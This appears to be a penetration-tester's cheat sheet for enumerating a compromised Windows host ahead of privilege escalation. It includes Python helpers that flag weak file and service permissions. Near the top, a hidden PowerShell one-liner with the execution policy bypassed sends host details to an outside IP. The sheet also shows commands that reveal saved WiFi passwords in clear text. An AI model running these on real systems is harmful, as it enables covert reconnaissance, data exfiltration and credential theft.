Windows
Introduction
This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.
General information exfiltration
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"
PowerShell History
c:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
User and group enumeration
whoami
echo %username%
Privileges
Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.
whoami /all
Enumerate the SE privileges of the current user
whoami /priv
Groups
net localgroup
net localgroup "<Group>"
# View domain groups
net group "<Group>" /domain
Operating system
Architecture:
wmic os get osarchitecture
General information:
ver
systeminfo
Environment variables:
cmd /c set
Hostname & Domain
# Returns the domain name
echo %USERDOMAIN%
systeminfo | findstr /B /C:"Domain"
Network enumeration
Hardcoded domains:
The file /etc/hosts also exists on Windows, under the following path.
C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
Port enumeration:
netstat -ano
Display routing table:
route print
Network configuration:
ipconfig /all
Shares:
net share
net1 share
SMB Signing enabled
Get-SmbServerConfiguration | select EnableSecuritySignature
View computers on your network:
net view
Status Firewall / AV / Windows Defender
# Status windefender
sc query windefend
# Status firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
# Deprecated command
netsh advfirewall firewall dump
WiFi Passwords: On Windows 10 we can obtain the WiFi password of each AP the computer has ever connected to.
1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear
Show ARP tables:
arp -a
Constrained Language Mode (CLM)
Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.
$ExecutionContext.SessionState.LanguageMode
# If CLM is enabled, these calls fail
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")
To bypass this countermeasure go to Countermeasure Evasion - CLM
AMSI
AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.
There are several ways to check if AMSI is enabled:
# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'
# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
To bypass this countermeasure go to Countermeasure Evasion - AMSI
AppLocker
AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.
You can check if AppLocker is enabled with the following command.
Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status
Obtain AppLocker rules:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize
To bypass this countermeasure go to Countermeasure Evasion - AppLocker.
Files Enumeration
PowerShell History
type c:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Disks
There are several ways to obtain the mounted disks on the system.
# CMD (run inside diskpart)
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
C 19,69 9,70 FileSystem C:\ Users
W 2,52 17,48 FileSystem W:\
Alternate Data Streams
Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this file system, a file is built up from several attributes, one of them being $Data, also known as the data attribute. Looking at the regular data stream of a text file there is no mystery: it simply contains the text inside the text file. But that is only the primary data stream. This one is sometimes referred to as the unnamed data stream, since the name string of this attribute is empty (""). So any data stream that has a name is considered an alternate.
Find Alternate Data Streams in a directory.
dir /r
If you want to search a directory or drive for ADS you can use this command in the root of the target:
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
Adding data to an alternate data stream.
echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe > prueba.txt:pepe
Read Alternate Data Streams.
gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden
Permissions
Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.
# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize
# Directory / File permissions
icacls "<Path>"
Simple Rights
F     Full access
M     Modify access
RX    Read and execute access
R     Read-only access
W     Write-only access
Specific Rights
D     Delete
RC    Read control
WDAC  Write DAC
WO    Write Owner
S     Synchronize
AS    Access System security
MA    Maximum Allowed
GR    Generic Read
GW    Generic Write
GE    Generic Execute
GA    Generic All
RD    Read Data / List Directory
WD    Write Data / Add File
AD    Append Data / Add subdirectory
REA   Read Extended Attributes
WEA   Write Extended Attributes
X     Execute
DC    Delete Child
RA    Read Attributes
WA    Write Attributes
Inheritance rights (applied only to directories)
OI    Object Inherit
CI    Container Inherit
IO    Inherit Only
NP    Do not propagate inherit
I     Permission inherited from parent container
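The table above is only useful once applied to real icacls output, so here is an added example (not from the original page) that parses the text `icacls "<Path>"` prints, splits every ACE into its inheritance flags and rights, and flags entries where a broad principal (Everyone, BUILTIN\Users, Authenticated Users, Interactive) holds a write-capable right. The sample output is constructed, and the principal names and path in it are assumptions.

```python
import re

# icacls inheritance flags (from the table above); everything else in an ACE is a right.
INHERIT = {"OI", "CI", "IO", "NP", "I"}
# Rights that let the holder alter the object, its ACL or its owner (simple and specific forms).
WRITE_LIKE = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "GW", "GA", "D", "DC", "WEA", "WA"}
# Principals every local user effectively belongs to (compared case-insensitively).
BROAD = {"everyone", "builtin\\users", "nt authority\\authenticated users",
         "nt authority\\interactive"}

def parse_icacls(output, path):
    """Return (principal, inheritance flags, rights) tuples from icacls output."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):              # only the first line carries the path
            line = line[len(path):].strip()
        principal, sep, flags = line.rpartition(":")
        if not sep or not flags.startswith("("):
            continue                           # blank line or the "Successfully processed" summary
        # "(OI)(CI)(RX,WD)" -> ["OI", "CI", "RX", "WD"]
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", flags) for t in grp.split(",")]
        aces.append((principal,
                     [t for t in tokens if t in INHERIT],
                     [t for t in tokens if t not in INHERIT]))
    return aces

def weak_aces(aces):
    """ACEs that hand write-capable rights to broad principals; (DENY) entries are skipped."""
    return [(p, r) for p, _, r in aces
            if p.lower() in BROAD and "DENY" not in r and WRITE_LIKE & set(r)]

# Constructed sample of `icacls C:\backup\Scripts` output (not captured from a real host).
SAMPLE = """C:\\backup\\Scripts NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                  BUILTIN\\Administrators:(OI)(CI)(F)
                  BUILTIN\\Users:(OI)(CI)(RX)
                  Everyone:(OI)(CI)(M)
                  WORKSTATION\\svc_backup:(I)(RX,WD)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    aces = parse_icacls(SAMPLE, "C:\\backup\\Scripts")
    for principal, inherit, rights in aces:
        print(f"{principal}: rights={rights} inherit={inherit}")
    print("weak:", weak_aces(aces))   # [('Everyone', ['M'])]
```

Everyone holding Modify on a scripts directory is the kind of finding this surfaces; the inherited `(I)` flag tells you whether the fix belongs on the parent container instead.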
Service rights
Service permissions are expressed as SDDL access control entries. The first field of each entry is its type, Allow (A) or Deny (D); the rights field is made up of the following two-letter codes.
CC  SERVICE_QUERY_CONFIG          Ask the SCM for the service's current configuration
LC  SERVICE_QUERY_STATUS          Ask the SCM for the service's current status
SW  SERVICE_ENUMERATE_DEPENDENTS  List dependent services
LO  SERVICE_INTERROGATE           Ask the service its current status
CR  SERVICE_USER_DEFINED_CONTROL  Send a service control defined by the service's author
RC  READ_CONTROL                  Read the security descriptor on this service
RP  SERVICE_START                 Start the service
WP  SERVICE_STOP                  Stop the service
DT  SERVICE_PAUSE_CONTINUE        Pause or continue the service
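As an added example (not from the original page), the decoder below parses a service security descriptor in SDDL form, such as the string `sc sdshow <service>` prints (the use of that command is an assumption; the page does not show it), expands the two-letter codes from the table above plus the remaining standard codes (DC = SERVICE_CHANGE_CONFIG, SD = DELETE, WD = WRITE_DAC, WO = WRITE_OWNER), and reports Allow entries that give a broad trustee a right capable of redefining the service. Both descriptors are constructed samples.

```python
import re

# Service-specific and standard rights as they appear in an SDDL rights field.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Well-known SDDL trustee abbreviations.
TRUSTEES = {"SY": "Local System", "BA": "Administrators", "BU": "Users",
            "AU": "Authenticated Users", "WD": "Everyone", "IU": "Interactive",
            "SU": "Service logon"}
BROAD = {"BU", "AU", "WD", "IU"}
# Rights that let the holder redefine the service: its binary/account, its ACL or owner, or delete it.
DANGEROUS = {"DC", "WD", "WO", "SD"}

def parse_sddl(sddl):
    """Return the DACL ACEs of a service descriptor as (type, [rights], trustee)."""
    dacl = re.search(r"D:([^:]*)", sddl)       # stop at the S: (SACL) section if present
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = body.split(";")               # type;flags;rights;objguid;inhguid;trustee
        ace_type, rights, trustee = fields[0], fields[2], fields[5]
        pairs = [rights[i:i + 2] for i in range(0, len(rights), 2)]  # "CCLC" -> ["CC","LC"]; hex masks not decoded
        aces.append((ace_type, pairs, trustee))
    return aces

def describe(aces):
    return [f"{'Allow' if t == 'A' else 'Deny'} {TRUSTEES.get(who, who)}: "
            + ", ".join(SERVICE_RIGHTS.get(r, r) for r in rights)
            for t, rights, who in aces]

def weak_service_aces(aces):
    """Allow ACEs granting any DANGEROUS right to a broad trustee."""
    return [(who, [r for r in rights if r in DANGEROUS])
            for t, rights, who in aces if t == "A" and who in BROAD and DANGEROUS & set(rights)]

# Constructed descriptors modelled on a typical service (not captured from a real host).
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Same service, but Authenticated Users were also granted SERVICE_CHANGE_CONFIG.
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")

if __name__ == "__main__":
    print(*describe(parse_sddl(WEAK_SDDL)), sep="\n")
    print("weak:", weak_service_aces(parse_sddl(WEAK_SDDL)))   # [('AU', ['DC'])]
```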
List Installed HotFixes
List all installed patches on the system.
Get-Hotfix
Running processes
tasklist
Scheduled Tasks
List/enumerate all the scheduled tasks present on the system.
(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName "<TaskName>" -TaskPath "<TaskPath>"